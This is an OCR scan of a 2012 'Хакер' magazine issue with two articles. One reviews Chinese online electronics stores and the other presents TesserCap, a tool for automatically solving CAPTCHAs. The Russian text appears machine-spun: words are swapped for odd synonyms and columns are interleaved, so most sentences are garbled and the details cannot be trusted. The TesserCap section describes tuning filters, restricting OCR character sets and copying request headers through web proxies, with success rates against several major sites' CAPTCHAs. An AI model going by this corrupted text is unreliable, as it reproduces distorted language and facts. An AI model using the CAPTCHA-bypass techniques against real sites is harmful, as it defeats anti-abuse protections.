03/158/2012


А АnьФа·Банк

Оформить дебетовую иначе кредитную «Мужскую карту» не запрещается во отделениях ОАО «Альфа-Банка», а что-то около а заказав сообразно телефонам:

(495) 029-2222 во Москве 08-800-333-2-333 во регионах России (звонок бесплатный) или нате сайте

www.mancard.ru

(game}land


PCZONE

Ромаша Володин (biohedge!Ogmail.coml

Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально дешевле пареных грибов дозволено нарыть планшетник получи Aпdгoid?

Или осциллограф? Или, для примеру, лазер? А запчасти чтобы разбитого смартфона? Да после этого же, идеже равно десятки тысяч других самых разных

товаров, которые на огромных количества х штампуются во Поднебесной, -в китайских интернет-магазинах. И, ась? важно, до самым доступным ценам .

MADE IN CHINA Три знакомых языкоблудие

в отношении нескольких с них- тех, со которыми имел

<<Made in China >>

издревле

обос н авались сверху по части гр ом н ом количестве все­

рукоделие либо пишущий эти строки сам, либо мои др узь я. Сразу хочу предупредить, в чем дело? избрание магазина- проблема

возможных товаров, на особенности получай технике.

субъективный. Перед кому лишь только не лень покупкой обяза­

Гл у в области было бы загадывать , что такое? вблизи от про­

тельно что ли отзывы равным образом имей во виду- весь гда

изводством никак не появятся огромные интернет­

вкушать малограмотный которая вероятность, ась? тыканье

магазины, идеже всё сие д обро допускается дать на лапу

потеряется , что такое? левак окажется бракованным,

за максимально ни зкой ц ене. Д умаю, многие

в чем дело? во коробку положат самую малость далеко не в таком случае либо соберут

слышали в рассуждении особенно раскрученном магазине

ассортимент никак не полностью- такое бывает

-

DeaiE xtгeme.com, - пусть даже разве е щ е сносно

везде, сверх исключений. Н в отношении из-за те цены, которые

во н ем безграмотный заказывали. Н что касается подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня мы хочу разгласить

вам со сим мириться. П риступ им?

ХАКЕР

03/158/ 0012

'


В небесная империя после пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не про всех товаров]

Q :zo М 02. S

.............

через 04 поперед 05 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Водан с лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает больше 00 000 наимено­

013 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров во почти что 000 категориях [гадже­ ты , аксессуары для ним равным образом где-то далее] . По край­ н ей мере, этак симпатия самолично заявляет. Проверить эти данные сложно, хотя то, в чем дело? на этом месте не запрещается разыскать

~

самого черта,- сие точно. В ассортименте

./

реверсирование стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 08Dдней

[ох контия сии китайцы], телефоны равным образом оргтехника

во теценне

00 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

в корне приемлемого качества [судя равным образом согласно лич­ ному опыту, равным образом за отзывам] .

Комn1>10теры да конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 0'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 0Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, что-нибудь привлекло меня присутствие знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ ко :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве от магазином, - сие цены. У некоторых

товаров они были ниже, нежели возьми еВау [да-да, китайцы продают что песку в море своего товара

нынешний раздел может служи ть <<nесочницей>>,

равно в западном аукционе, хотя автор данный миг

идеже дозволительно дать взятку прикольную мелочевку

Впрочем, доставка, на правах равно везде, может затя­

принимать во внимание отнюдь не будем]. Как оказалось поз­

равно приглядеться ко сервису, невыгодный тратя значи­

нуться. Обычно посыл около хо дит отнюдь не первоначально ,

же, вероятность сбывать согласно ценам дальше

мых сумм.

нежели вследствие двум недели. Если твоя милость сделаешь за­

Каждый левак имеет описание, рейтинги

рыночных обусловлена территориальной бли­

в качестве кого у около всех магазинов такого плана.

каз сверх $20, ведь <<Фокал>> ласково привяжет

зостью магазина для заводам -изгот овителям.

равно отзывы, которые помогут содеять альтернатива .

для твоей посылке трек-номер на отслежива­

Более тог о, «Фока л >> при всех предлагает

Для оплаты дозволительно истощить PayPal.

ния статуса деятельность .

бросить получай форуме магазина извещение

С недавних пор FocaiPrice стал допускать

по отношению том, почто твоя милость есть какой-либо с това-

равно

WebMoney, да все еще безвыгодный пользу кого всех товаров .

В целом выгода оставляет приятное впе­ чатление , но, клеймящий объединение отзывам, равно симпатия невыгодный лишен

ровенник дешевле,- на таком случае плата хорош

Магазин много раз проводит непохожие акции,

на сех бивак дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям опять же доступен

а к некоторых предложений снедать ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых не грех встретить

ветствие характеристикам.

отсортированы в области ценам, начиная ото одного

на интернете.

доллара. Для сомневаю щихся либо — либо новичков

Что касается доставки, так возлюбленная бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- сие отличная реальность поэкономить маленько денежек . Причем произвести шифр купона

нимало безграмотный сложно: их раздают бери сайтах кажется гeta il menot . com [крупнейший, только англоя зы чный ресурс] , chinaprices.гu , а равным образом во темат ических сообществах . В конце концов, допускается банально вбить во искатель <<куnон нате скидку <ИМЯ магазина»> .

0. Чтобы бегло разыскать увлекающий тебя предмет торговли равно поставить на одну доску цены, дозволяется nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой а услуга поглощать да получи сайте ch i napгices.гu .

0.

Перед покупкой безграмотный поленись полазать по мнению форумам, nочитать информацию по отношению томище другими словами ином магазине- сие может чрезвычайно nомочь . Изучай nлощадки. Изучай, изучай равно уже раз в год по обещанию изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

01

Бижутерия

а

Товары интересах

I!J

Товары пользу кого

автомо

иля

здоровья

детеи

~

u ~

0 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков без дальних разговоров конца нет - ко примеру, форумы ebay-foгum.гu равным образом mySku.гu .

0.

Если против всякого чаяния произошла какая-то оплошность [допустим, nри что до тправке , доставке] alias очищать вопросы по ассортименту- безграмотный стесняйся отмечать на поддержк у. В персонал е некот орых магазинов аж есть русскоговарящие сотруд ники.

0.

При оплате заказа нужно исnользовать исключительно nроверенную платежную систему. В одонтагра шин стве случаев сие

PayPal . Некоторые китайские магазины поддерживают WebMoney равно ажно Qiwi, но, PayPal- они оче нь хитрожопо умеют отгадывать проблемы

тем невыгодный менее, аз многогрешный рекомендую пустить в дело

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

от нерадивыми продав цами.

0.

Терnение, терnение равно снова крат терnение. Заказывая чрез интернет, н ужно присутствовать готовым

Qiwi

подождать. Заказ могут целую вечность формировать, растянуто отправлять, а впоследствии сдержать держи таможне

или — или получи каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 0012

Кредитные игра в карты

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

01

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 00 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

00 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой первоначальный эмпирия покупки на китайских

~.,

интернет-магазинах мы секс учил прямо здесь.

......

-·-·--

Чего мы всего-навсего малограмотный заказывал: равно защитные

пленки, равно батарейки, да фонарики, да защита для телефона, да всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать после этого особенно да нечего: нынешний фонд

еще опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 05 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные во астрономических количествах равно по части куда

привлекательным ценам. Е сть двухдолларо­ вая пояс с целью мелочевки, разделы новинок

Отследить отправка допускается сообразно тр ек-номеру,

да из пецпредложений . Аналогично TiпyDeal ,

некоторый предоставляется на чужеземный счёт пр да за­

резерв предлагает извлекать пользу да скоплять

казе с лишним

бонусные баллы, п убликуя описания alias видео

да отзывы бери форумах, позволено резюмировать:

позволительно быстрее, ведь паче употребить

для товарам. Выполнить оплату потребитель может

D ealextгeme- доблестный магазин, у которого

другим ресурсом, особенно сие касается людей,

вследствие

лишь единолично недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку дозволено терпеть пуще месяца!,

ничеством!.

Pa yPa l

сиречь от п омо щью кредитной игра в карты ,

быть этом ради доставку сам черт ни аза никак не возьмет.

$15. Учиты вая

личный проба

который связано не без; громадным числом заказов .

Итог: одиночный изо самых раскрученных мага­ зинов. Но кабы тебе нужно почерпнуть левак в качестве кого

"

Tinydeal.com ';..[

относительно

0 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 0 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

0 ДО 05

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и избыток самых разных товаров , притом

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

произвольный месяцок появляется малость тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги равно отзывы, а когда видео равно русскоязычные коммен­

тарии. Порадовал вот и все онлайн-чат, идеже я смог амором извлечь ответы бери интере­ сующие меня вопросы, притом для русском

языке. На сайте очищать раздел спецпредло ­

дарков. Помим по отношению

жений из еженедельными скидками, а опять же

ются кредитные картеж равным образом WеЬМопеу. Впро­

ко товаров, ведь интересах получения нечистая сила платн ого

пятидолларовая область распространения к мелких товаров.

чем, моя персона весь в равной степени напористо рекомендую

треки н г-номера ценник хо тя бы одного с них

Цены сильнее нежели приемлемые , факультативно

исполнять всегда торговые связи от

винтернетеможно выискать купоны нате скидки

больше надежно, лучше камня на камне не оставить транзакцию .

должна фигурировать за пределами $20. В противном случае за треки н г придется довнести $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему глотать воз­

К тому но сверху оплату картами в ту же минуту д ейству­

моей покупкой на этом магазине был телефон,

можность в соответствии с купать вещи ради баллы [так

ет усечение во $150.

равно всё все как рукой сняло вроде возбраняется лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

для оплате принима­

PayPal-

зто

Доставка во любую точку таблица бесплатна.

единственный нюанс: неравно во тво ем заказе несколь-

Вывод: касательно тличны й ряды из широким ас­

после публикацию комментариев да обзоров .

Посылка идет, по образу равным образом везде,две-три недели [бы­

сортиментом, адекватные стервис да поддерж­

Приятный бонус- возле заказе получи сумму

вает, который доходит да из-за неделю, однако сие бывает

ка - например, разве быть получении что-то

сверху

редко!. Трек-номер ради отслеживания посылки

безграмотный хватает, ведь по прошествии обращения заурядно безо

выдается около заказе от бога

проблем высылают недостающее .

$200

тебе предложат наметить безраздельно

с нескольких возможныхнебольших весь

01,0

$35, а шелковица убирать

ХАКЕР

03/158/2012


В небесная империя вслед покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 0'8g1stor

n

Поисхаn. мсь мага1мн 0Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

с 05 давно 05 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 0 USD

&'М

live

0611 коо,..а(О)

-

0р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще одиночный странный интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый недовольно ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, получи муж взгляд, ряды максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 003 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован в целях русскоговарящих покупате­

лей. Судя за отзывам, се г одня возлюбленный безраздельно с лиде­

В се что до

последних

канал за числу продаж во страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен предприимчивый русскоязычный раздел, а супрефект магазина неоднократно

Вынrраrь

встречается от потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

получи и распишись тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- меньший ассор ­

Популярные вещи

тимент телефонов (в томишко числе равным образом вместе с следовать косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

подо популярные марки ! . Вотан мои знакомый при обрел на Pa ndawill городок уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 0GB 0GB RАМ

мо д ел ь телефона да остался доволен по образу самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а ко равно быстрой д оста на кой, кото раиса

заняла общей сложности цифра дн ей. Советую безвыгодный забыть про раздел распродаж- с годами -де йствительно

не запрещается откопать адски дешевые т овары . Оnлата через PayPal равно ли картами Visa равно Master Сагd,

предоставления бесnлатного трек-номера: его

вдобавок не возбраняется настил учит ь заметную ски дк у

допускается извлечь только лишь nри заказе получи и распишись сумму

зоомагазин интересах русскоязычного пользователя,

согласно купону. До оклад буд е т бесплатной. Един­

не без; выш е $50 (тут в соответствии с сравнению не без; конкуре нтам да

хоть бы да никак не вместе с самыми ни зкими ценами получай попу ­

стве нное, что такое? ми далеко не понравилось,- усик л овие

« Панда >> самоочевидно проигрываетl.

лярные товары.

Общее впечатлени е: балдежный запутанный

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

через

Срок доставки:

ото

~Е] fj

0

0 вплоть до 05 дней

Категориитоваров: m~во -

04 вплоть до 05 дней

Способы оплаты:

PayPal· -

Срок доставки:

с

0 перед 05

дней

Многие люд успешно nриобретали во этом

Интернет-магазин через предприимчивы х

Порадовала до боли быстрая lи, кстати,

магазине планшеты равно оставшиеся гаджеты ,

американцев. Посылки приходят с Китая ,

бесnлатная) своз , особенноучитывая

однако у меня был горестный опыт: заказав

пусть бы на поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

равно оплатив телефон, моя персона получил форма вместе с

Заказывал у ни х до мелочи- кобура , ЗG-модем

сайт безвыгодный уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

да стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

равным образом далеко не того цвета . Печален даже если отнюдь не самоуправно звезда

китайского магазина, плата чрез PayPal равным образом бесплатная подача nрисутствуют,

бы не. зто, так зоомагазин занял бы достойное

отnравки безвыгодный праздник модели, а то, почто всегда попытки как-то вынести решение проблему малограмотный увенчались

только nосылки отправляют обычной почтой равно помимо

равно TinyDeal .

успехом. Возможно , чрез

трекинга .

PayPal

было бы

район неподалёку вместе с моими фаворитами FocaiPгice

элементарнее распахнуть диспут, так неграмотный факт.

ЗАКЛЮЧЕНИЕ

не запрещается поэкономить . Если рестант кроме отзывов­

обращайся во службу поддержки. Н е забывай :

В заключен да е хочетс автор этих строк по ба скручивать , ась? по части дин равно оный

хоть лопни уточняй комплек тацию равно харак­

китайские интернет-магазины всего только с целью тех,

но рестант может фигурировать умереть и неграмотный встать многих магазинах,

теристики : почасту присылают кое-что отличное

который может терпеть . Е сли что такое? -то нужно тогда да

так по части разным ценам. П озтому попервоначалу сравни

с указанного во описании. Чтобы максимально

сейчас, так полегче семо хоть неграмотный заглядывать. И

равным образом всего дальше совершай заказ. Не поленись

избавить себя, оплату л у чше пров одить

сердцевина правило: тот, кто такой ищет, всякий раз найдет.

порыскать на Сети куnоны сверху скидку, не без; ними

от PayPal. В случае проблем кровь из носу

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 0gursev.kal ra!a foundstone .com 0

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы с целью обхода САРТСНА, которыми защищены с а й твоя милость . Во - первых , будучи из твуют с п е ц равно альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» изо

#1 05

да

#126

Р летчик п озна во а н ие СА Р ТС Н А - загадка чаще во этого

номеров соответс т венно. Сегодня а мы хочу

нетривиальна мы . Н а рисунок должен

ра сс показывать тебе относительно разработке TesseгCap, ко т по части ­

укладывать массу присест л ичных фильтров, что­

рую ав т шум называет универсальной решалкой

бы убрать искаже н ия да п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, вроде ни кру т и.

работчики желают зафиксировать твердость следовать щ да т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

ко оторые да спользуют грошовый

Зач а стую п риходится реализо во ыват ь обучае ­

ручно й дело равным образом бу ко вально после $1

мую сис т ему в ос н ове нейронных сетей [зто,

Ч так от д елал пишущий сии строки п ро г раммы? О н посмотре л ,

предлагают урегулировать

ко слову, безвыгодный таково не без; л ожно, на правах може т показа ть­

во вкусе нормально подхо д ят ко п р облеме автоматизи­

ся], с намерением д обиться п р иемлемого результ а т а

ро на практически н ого решения СА Р ТСНА равно по мнению п робовал

объединение ав т оматизиро на анному р ешению капч. Ч тоб ы

просуммировать таковой проба на насчёт д ном да н струмен т е .

понять, по части нежели ваш покорный слуга говорю, лу чш е п что до д нят ь очень на

Автор заметил, ась? к удаления ш умов со из ­

0000

капч.

В ко ачестве альтернативы м что до ж н относительно подвергнуть проверке написать и нтелле для туальную не без; да стему,

равным образом прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т насчёт ест ь реше н ия самой слож н ой

САР Т С Н А: толкование равным образом прак т ика. Р азбираемся,

задачи рядом распознавании капч, чаще целое г касательно

как бы л омают ка п чи» равно << П относительно д смо т рим да рас п озна-

применяются одни равным образом те а фильтры. П олучает-

котяга орая в соответствии с опред е ленным

алгор да т м а м короче сама выполнять различение .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее днесь не возбраняется

HMLR

р е ал с ова т ь от соответственно м ощью

со пец равно альной утилиты .

01,2

С хема анализа САРТСНА- изображени й от через

TesserCap

ХАКЕР

03/158/2012


Проверка возьми устойчивость

не без; я, аюшки? неравно осуществить покойный инструмент, позволяющий минуя сложных математических

~ ~-

.....

-

преобразований наваливать фильтры нате из ­

[: 0152\4'] ~ ~~-- ·::

бражения, равным образом совокупить его со ОСR-системой

-

- -

... _

совершенно работоспособную насчет грамму. Это, с обстве нн о, равно нашел Гурсев Сингх Калра

изо компании

McAfee. Зачем

--·==

... 0

L41 ~2~

чтобы распознавания текс т а, т в рассуждении дозволено извлечь

з т что касается было нужно?

0

01~2\А

Автор утили т ы решил таким об раз в год по обещанию ом про­

\ 'О=

верить, до какой степени безопасны капчи для рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 0

~- ,------

""---""""""""'

Wiilli)

в отношении

-

.

.

0 ~- 0 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

01~

l ~k l 0 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

005Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная изготовление изображений равно равно з желание

Кандидатами для сочувствие во т естировании стали

текста изо капчи

Wikipedia,

еВ ау, а равным образом

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

01 о 1 0" liJ G 1 0 ~269

посещаемыми в соответствии с версии известного сервиса

такие монстры, по образу

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru из предварительной обработкой изображений . Судя до результатам, фильтр подобрать никак не посчастливилось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно касательно расценивать результаты рас до з нав а н ия

статут функционирования программы, т в отношении насчёт н

стает отверстие из тре мя вкладками:

изображений, по отношению тм етив всякий изо них равно как

достанет прост. Исходная капча поступает

lmage

во систему предварительной обработки изо­

заключает начатки управления, которые

няя, самый значимая ипостась служит ради

бражений, очищающей наплыв говорят ото всяких шумов

исnользуются с целью зап у ска равно остановки теста

передачи любого изображения во систему nред­

равным образом искажений равным образом соответственно конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, во которой задается

лученное вид ОСR-системе, которая

ти стики т еста !сколько отга дан о, а сколечко

фильтр, удаляющий не без; изображения шумы равно ис­

со тарается разнюхать конферанс получи и распишись нем . TesseгCa p

нетl, навиг а ци равным образом равно выбора изображения про

каже ния. Чт обы дать кресловина т инку во сис т ему

имеет диалоговый графиче ский интерфейс

предварительной обработки. В раздолье на ввода

предварител ьн ой обработки, получи д об угрохать

равно обла верно е т следующими свойст на ами :

URL-aдpeca долженствует оказываться указан истинный

получи требуемом изображении nравой кноnкой

Е сли полагать на об суп х качество х

0.

0.

0.

Ma in, Options,

P гepгocessing. Основная супинатор

коррек т н ы й иначе неполиткорректный . Н у да послед­

URL-

Имеетуниверсальную систему пре двар равным образом ­

aдpec, какой-никакой веб-приложение использует

мыши равно во кон т екс т ном подбор удосужиться условие

тельной обработки изображений, которую

к извлечения капч. URL-aдpec не грех по­

Send

допускается держи создавать к каждой отдельной

л вразумлять следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

для н что касается nко й мыши

Включает на себя сис тем у распознавания

отксерить сиречь замечать шифр страницы

Вкладка в рассуждении пци й со д ержит непохожие злементы

Tesseгact, которая извлекаеттекст с пред­

равным образом извлечь URL-aдpec с атрибута sгс тега из ­

уnравления на конфигурирова ния TesseгCap.

варительно проанализированного равным образом под­

бражения

Здесь не запрещается отобрать ОСR-систему, после д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто домицилий www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name=xakep . гu . Ряд ом со стро-

сацию равно предварительную обработку изобра­

ко дир овок на системе распознавания .

для ой а др еса находится элеме нт, задающий

а ни й, прибросить пользовательские НТТР­

ко оличество капч, которые н ужно завалить

после головки , а и установить диапаз насчёт н символов

Думаю, полный доминанта понятен, поэто м у

чтобы тестирования. Та ко что адденда может

про системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, на случае от

xakep.

предлагаю посмотреть, вроде сие выглядит .

синхронно nоказывать всего лишь

Универсал ьн отросток утилиты н е могла неграмотный приве­

б р ажений, во нем предусмотрены основы

сти ко усложнению ее интерфейса, п оэтому ок н по части

у пр авления на постраничного п ролистывания

программы может вв ести во куцый не без; т у пор .

загружен ны х наплыв ч . Та ким образом, присутствие мас­

02

изо­

норма веб-прокси, сделать сложный частью nереадре­

во нижнем регистре, буквы во верхнем регистре , сnециальные символы.

Теперь касательно каждой оnции поподробней . Пр язва д е всего, дозволяется выкроить ОСR-систему.

Так что, пред т ем вроде п ереходить н е п ос ред­

штабном тестировании я сможем nроли­

П относительно умолча нию д оступна всего-навсего одна ­

ствен н по отношению для ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр подвергать осмотру

Te sseгact -ORC , приблизительно сколько замора чивать ся

разобраться вместе с ее интерфейсом да заложенным

результаты их распознавания. Кнопки Staгt

из выбором т ут малограмотный придется. Еще одна ужас

функциона л ом.

да

интересная выполнимость программы- вы­

Stop запускают

равно оста н ав лива надстройка тестиро­

вание соо тветствен но. По вместе с ле те со т ирования

сверло диапазона символов . Возьмем, напри­ мер, капчу вместе с xakep . гu- видно, что-нибудь симпатия далеко не со­

д е ржит н да одной букв ы , а состои т т в рассуждении льк о из цифр. Так на фигища нам лишние символы, которые исключительно увеличат шанс безвыгодный кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни для чему, потому-то рядом тестировании капчи

xake p.гu не чета указать, ась? возлюбленная содержит Мы неграмотный могли безграмотный говорить х отя бы туман слов об

Подразделение профессиональны х услуг

что касается существование цифры: Num eгics. Но ась? буде поднять

авторе замечательной утилиты TesseгCap .

FoundstoneФ, на котором дьявол трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные сервис равным образом обучение,

п ознать капчу, состоящую с заглавных букв

главным консультантом на подразделении

обесnечивает nостоянную да действенную

любого языка? Н ет, безграмотный сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов ото самых серьезных угроз.

рет инвентарь символов, используемых ради рас­

на х одит на круг

Команда nодразделения nрофессиональны х

познавания, с конфигурацио нны х файлов,

услуг состоит изо признанных экспертов

находящихся во \Ргоgгаm

на области безоnасности да разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал нате таких конференциях, во вкусе Тоог­ Соn ,

NuiiCon

да

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap равным образом SSLSmaгt . Помимо

имеющих роскошный оnыт сотрудничества

П оясню в прим ере : разве пишущий сии строки выбрали

сие го , разработал мало-мальски инструментов на

из международными корnорациями

опции Numeгics да L oweг

внутренних нужд комnании . Любимые языки

равно государственными организациями

обратится для файлу loweгпumeгic, начинаю­

до воnросам безоnасности .

щ емуся со параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 0012

Ruby, Ruby on Rails

да С#.

Case,

в таком случае пр ограмма


PCZONE За ним долженствует инвентарь символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут употребляться к решения капчи.

PREPROCESSING

По умолчанию во файлах содержатся лишь

Н у вишь автор сих строк равно добрались предварительно самой интересной

буквы латинского алфавита, приближенно что такое? с целью рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы необходимо прийти получи и распишись смену не так — не то

на у д а л е н ия от капч различных шумов да раз­

мытий, которые стараются максимально

расширить роспись символов.

Теперь каплю что касается том, с целью зачем нужно поле

Http Request

Headeгs. Например, сверху не­

Процесс настройки универсального фильтра предельнопрости состоит изо девяти буква п ов.

того так чтобы вкусить капчу. Чтобы TesseгCap

Изменения изображения отображаются бери

смогла унаследовать дорога ко капче, программе

каждом этапе предварительной обрабо т ки.

надлежит вручить на запросе НТТР такие

Кроме того, сверху странице нет переводу компо-

заголовки, во вкусе Ассер!,

нент проверки, кой позволяет отдать справедливость

равным образом Rеfеггег

равно т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs равным образом т. д.l, можно перехватить посылаемые заголовки запро­

са да установить их во край ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- сие

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

00-30%

ЕЬау

00-30%

reddit.com

00-30%

CNBC

>50%

foodnetwoгk.com

00-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи присутствие

Http Request

Follow

САЙТАХ

затруднить задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, с целью

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

0.

Инверсия цвета

Дело на том, что-нибудь TesseгCap в соответствии с умолчанию

пикселей в целях САРТСНА-изображений. Код,

никак не подобает переадресации. Если испытательный

отрекомендованный ниже, демонстрирует, на правах сие

pasteЬin.com

00-80%
